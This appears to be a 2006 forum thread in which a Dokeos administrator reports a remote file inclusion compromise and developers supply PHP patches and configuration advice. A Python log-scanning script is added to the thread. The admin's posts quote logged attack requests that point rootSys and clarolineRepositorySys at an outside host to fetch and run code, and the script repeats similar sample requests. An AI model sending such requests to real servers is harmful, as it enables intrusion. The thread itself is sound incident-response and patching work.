[Fixed Dokeos 1.6.4] is it a security problem?

Postby vianney » Wed Apr 05, 2006 6:45 pm

Is there a known security vulnerability with
/claroline/exercice/testheaderpage.php?rootSys ?

My server has been hacked using this URL
/claroline/exercice/testheaderpage.php?rootSys=http://www.mptechno.cz/cse.gif?&c etc.

on Dokeos 1.6.2

Thank you for your help.
vianney
 
Posts: 13
Joined: Thu Feb 09, 2006 3:17 pm

Postby pcool » Wed Apr 05, 2006 7:21 pm

This is indeed a security hole. You can expect a new dokeos version tomorrow.

If you want to fix this already you have to do the following:
1. open inc/claro_init_global.inc.php
2. find the 4 occurrences of

   if(!isset($_SESSION[$key]) && $key != 'includePath')

3. replace these 4 occurrences with

   if(!isset($_SESSION[$key]) && $key != 'includePath' && $key != 'rootSys' &&
      $key != 'clarolineRepositorySys' && $key != 'lang_path' &&
      $key != 'extAuthSource' && $key != 'thisAuthSource' &&
      $key != 'main_configuration_file_path' && $key != 'phpDigIncCn' && $key != 'drs')
pcool
 
Posts: 3039
Joined: Mon Jun 23, 2003 2:08 pm
Location: Ghent University

Postby vianney » Wed Apr 05, 2006 7:31 pm

thank you very much
vianney
 
Posts: 13
Joined: Thu Feb 09, 2006 3:17 pm

Postby pcool » Wed Apr 05, 2006 7:36 pm

an alternative solution (but equally good and maybe easier to implement) (although I prefer the first solution)

add somewhere on the top of the page of claro_init_global.inc.php (solution by Olivier and René)

foreach (array('includePath', 'rootSys', 'clarolineRepositorySys') as $dontfake)
{
    unset($_GET[$dontfake], $HTTP_GET_VARS[$dontfake], $_POST[$dontfake], $HTTP_POST_VARS[$dontfake]);
}
pcool
 
Posts: 3039
Joined: Mon Jun 23, 2003 2:08 pm
Location: Ghent University

Postby domifreitas » Thu Apr 06, 2006 9:18 am

Should we do the same upgrade for Dokeos community release 2.0.2?
domifreitas
 
Posts: 602
Joined: Mon Oct 18, 2004 10:00 pm
Location: Portugal

Postby turboke » Thu Apr 06, 2006 10:46 am

domifreitas wrote:Should we do the same upgrade for Dokeos community release 2.0.2?

You should. The patch will be included in CR 2.0.3 (see this post: http://www.dokeos.com/forum/viewtopic.php?p=27903#27903).
turboke
 
Posts: 733
Joined: Mon Feb 21, 2005 12:26 pm
Location: Hogeschool Gent, Belgium

Postby roan » Thu Apr 06, 2006 11:43 am

turboke wrote:
domifreitas wrote:Should we do the same upgrade for Dokeos community release 2.0.2?

You should. The patch will be included in CR 2.0.3 (see this post: http://www.dokeos.com/forum/viewtopic.php?p=27903#27903).

Community release 2.0.3 with the security fix is ready now: http://www.dokeos.com/forum/viewtopic.php?p=27910#27910
Update: more security fixes available in the new community release 2.0.4: http://www.dokeos.com/wiki/index.php/Dokeos_community_2.0.4_release_notes
Last edited by roan on Thu Apr 13, 2006 10:53 am, edited 1 time in total.
roan
 
Posts: 2192
Joined: Wed Dec 11, 2002 10:37 am
Location: Free University of Brussels, Belgium

Postby vianney » Thu Apr 06, 2006 2:48 pm

pcool wrote:This is indeed a security hole. You can expect a new dokeos version tomorrow.

If you want to fix this already you have to do the following:
1. open inc/claro_init_global.inc.php
2. find the 4 occurrences of

   if(!isset($_SESSION[$key]) && $key != 'includePath')

3. replace these 4 occurrences with

   if(!isset($_SESSION[$key]) && $key != 'includePath' && $key != 'rootSys' &&
      $key != 'clarolineRepositorySys' && $key != 'lang_path' &&
      $key != 'extAuthSource' && $key != 'thisAuthSource' &&
      $key != 'main_configuration_file_path' && $key != 'phpDigIncCn' && $key != 'drs')

Are you sure this is enough? I applied this code yesterday, like this. But my server was hacked for the second time today, in the same way:

[06/Apr/2006:14:52:59 +0200] "GET /claroline/exercice/testheaderpage.php?rootSys=http://www.mptechno.cz/cse.gif?&cmd=cd...
etc.
vianney
 
Posts: 13
Joined: Thu Feb 09, 2006 3:17 pm

Postby pcool » Thu Apr 06, 2006 2:54 pm

Can you post your claro_init_global.inc.php here so that we can verify if you applied the fix correctly?
pcool
 
Posts: 3039
Joined: Mon Jun 23, 2003 2:08 pm
Location: Ghent University

Postby vianney » Thu Apr 06, 2006 3:07 pm

here it is:
Last edited by vianney on Thu Apr 06, 2006 3:45 pm, edited 1 time in total.
vianney
 
Posts: 13
Joined: Thu Feb 09, 2006 3:17 pm

Postby pcool » Thu Apr 06, 2006 3:45 pm

Your server probably has register_globals=on in php.ini.
This should be set to off.

You can also use the second approach in this case. Add to the top of claro_init_global.inc.php:

foreach (array('includePath', 'rootSys', 'clarolineRepositorySys') as $dontfake)
{
    unset($_GET[$dontfake], $HTTP_GET_VARS[$dontfake], $_POST[$dontfake], $HTTP_POST_VARS[$dontfake]);
}
pcool
 
Posts: 3039
Joined: Mon Jun 23, 2003 2:08 pm
Location: Ghent University

Postby vianney » Thu Apr 06, 2006 5:31 pm

I will try.
Actually, register_globals is on.
Should "off" be used for Dokeos, or must it be? I thought it was "should".

Actually the 3rd hack, they like me :-(
it is quite different:

[06/Apr/2006:17:18:50 +0200] "GET /claroline/resourcelinker/resourcelinker.inc.php?clarolineRepositorySys=http://www.mptechno.cz/cse.gif?&c
etc

Is the new code OK for that too ?
vianney
 
Posts: 13
Joined: Thu Feb 09, 2006 3:17 pm

Postby Tripple » Thu Apr 06, 2006 7:51 pm

I added the fix on my Dokeos 1.6.1 installation.
How do I know if I was hacked? Do I have to search my logfile for 'rootSys'?
Tripple
 
Posts: 406
Joined: Mon Nov 29, 2004 8:59 pm
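Tripple's question about searching the log file, as an added example that is not part of the thread: a Python scan over Apache access-log lines that flags any request supplying one of the configuration keys named in pcool's patch, and classifies the value as a remote include (URL scheme), a path traversal, or a plain override. The log lines, client addresses and the attacker.example hostname are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Configuration keys the patch in this thread refuses to take from the request;
# a legitimate client never sends any of them in a query string.
SENSITIVE_KEYS = {"includePath", "rootSys", "clarolineRepositorySys", "lang_path",
                  "extAuthSource", "thisAuthSource", "main_configuration_file_path",
                  "phpDigIncCn", "drs"}

# Apache combined log: client ident user [time] "METHOD uri protocol" status ...
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<uri>\S+)(?: [^"]*)?" (?P<status>\d{3})')
URL_SCHEME_RE = re.compile(r"^[a-z][a-z0-9+.-]*://", re.I)

def suspicious_params(uri):
    """Return (key, value, kind) for each sensitive key in the query string:
    'remote-include' if the value has a URL scheme, 'traversal' if it contains
    '..', otherwise 'override' (any request-supplied value is a red flag)."""
    hits = []
    for key, value in parse_qsl(urlsplit(uri).query, keep_blank_values=True):
        if key not in SENSITIVE_KEYS:          # parse_qsl already percent-decodes
            continue
        if URL_SCHEME_RE.match(value):
            kind = "remote-include"
        elif ".." in value:
            kind = "traversal"
        else:
            kind = "override"
        hits.append((key, value, kind))
    return hits

def scan_log(lines):
    """One finding per suspicious parameter; unparseable lines are skipped."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        for key, value, kind in suspicious_params(m["uri"]):
            findings.append({"ip": m["ip"], "time": m["time"], "status": int(m["status"]),
                             "key": key, "value": value, "kind": kind})
    return findings

# Constructed sample lines (addresses, hostname and sizes are made up).
SAMPLE_LOG = [
    '203.0.113.7 - - [06/Apr/2006:14:52:59 +0200] "GET /claroline/exercice/testheaderpage.php?rootSys=http://attacker.example/cse.gif?&c=1 HTTP/1.0" 200 1432',
    '203.0.113.7 - - [06/Apr/2006:17:18:50 +0200] "GET /claroline/resourcelinker/resourcelinker.inc.php?clarolineRepositorySys=http://attacker.example/cse.gif?&c=1 HTTP/1.0" 200 980',
    '198.51.100.2 - - [06/Apr/2006:18:01:12 +0200] "GET /claroline/exercice/exercice.php?exerciseId=12 HTTP/1.1" 200 5120',
]
if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']} {f['key']}={f['value']} [{f['kind']}] status={f['status']}")
```

A 200 status on a flagged line means the script ran with the injected value; on a patched server with register_globals off the same request is harmless, but the attempt is still worth recording.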

Postby roan » Thu Apr 06, 2006 9:57 pm

vianney wrote:I will try.
Actually, register_globals is on.
Should "off" be used for Dokeos, or must it be? I thought it was "should".

Dokeos works with register globals on or off. We strongly suggest you set it to off, because setting it to on is a huge security risk.
roan
 
Posts: 2192
Joined: Wed Dec 11, 2002 10:37 am
Location: Free University of Brussels, Belgium

Postby Tripple » Thu Apr 06, 2006 10:03 pm

roan wrote:Dokeos works with register globals on or off. We strongly suggest you set it to off, because setting it to on is a huge security risk.


Does Dokeos 1.6.1 work with globals off?
Tripple
 
Posts: 406
Joined: Mon Nov 29, 2004 8:59 pm

Postby roan » Thu Apr 06, 2006 10:17 pm

Tripple wrote:
roan wrote:Dokeos works with register globals on or off. We strongly suggest you set it to off, because setting it to on is a huge security risk.


Does Dokeos 1.6.1 work with globals off?

Yes, from Dokeos 1.6.0 and community release 2.0 upwards Dokeos works with register_globals off. I can't remember about Dokeos 1.5.x but those users should upgrade anyway ;-)

However we performed a small trick to make this happen, which caused this security problem. In the next major releases (community release 2.1 and plain Dokeos 1.8) this trick is going to be removed to make Dokeos more secure.
roan
 
Posts: 2192
Joined: Wed Dec 11, 2002 10:37 am
Location: Free University of Brussels, Belgium

Postby vianney » Fri Apr 07, 2006 7:35 am

roan wrote:Dokeos works with register globals on or off. We strongly suggest you set it to off, because setting it to on is a huge security risk.


in the INSTALL file it is said that:

Past Dokeos versions required register_globals to be set to On. This is no
longer necessary, this can be set to Off and Dokeos will work fine.


But as I can see from my experience it can't be used with register_globals "On" because there is a major security hole when it is used in production this way.
Dokeos should say it clearly.

Secondly, I can tell you that the two possibilities of code you proposed against the hole presented in this post are inactive when register_globals is On.
vianney
 
Posts: 13
Joined: Thu Feb 09, 2006 3:17 pm

Postby pcool » Fri Apr 07, 2006 8:15 am

When register globals is set to on then the only hole that still exists is in resourcelinker.inc.php.
Dokeos 1.6.4 zip package has the corrected resourcelinker.inc.php file already (tar.gz doesn't yet).
I noticed today that not all my fixes made it to the CVS (I have lost all my icons on my windows box so I could not see if the files were changed or not)

What I advise you is:
1. set register_globals to OFF
2. take the Dokeos 1.6.4 ZIP package and use this one to update your campus.
pcool
 
Posts: 3039
Joined: Mon Jun 23, 2003 2:08 pm
Location: Ghent University

Postby frmartens » Fri Apr 07, 2006 8:23 am

pcool wrote:Dokeos 1.6.4 zip package has the corrected resourcelinker.inc.php file already (tar.gz doesn't yet).


Is this possible? Both files should be created on the same CVS tag.

I'm also wondering: is the zip file only intended to be installed on a windows server or is it just another means of packaging it?
frmartens
 
Posts: 399
Joined: Mon Sep 20, 2004 8:04 am
Location: Ghent Arteveldehogeschool

Postby pcool » Fri Apr 07, 2006 9:03 am

It's just a means of packaging.
I manually added the corrected files to the zip file but couldn't do this for the tar.gz.
pcool
 
Posts: 3039
Joined: Mon Jun 23, 2003 2:08 pm
Location: Ghent University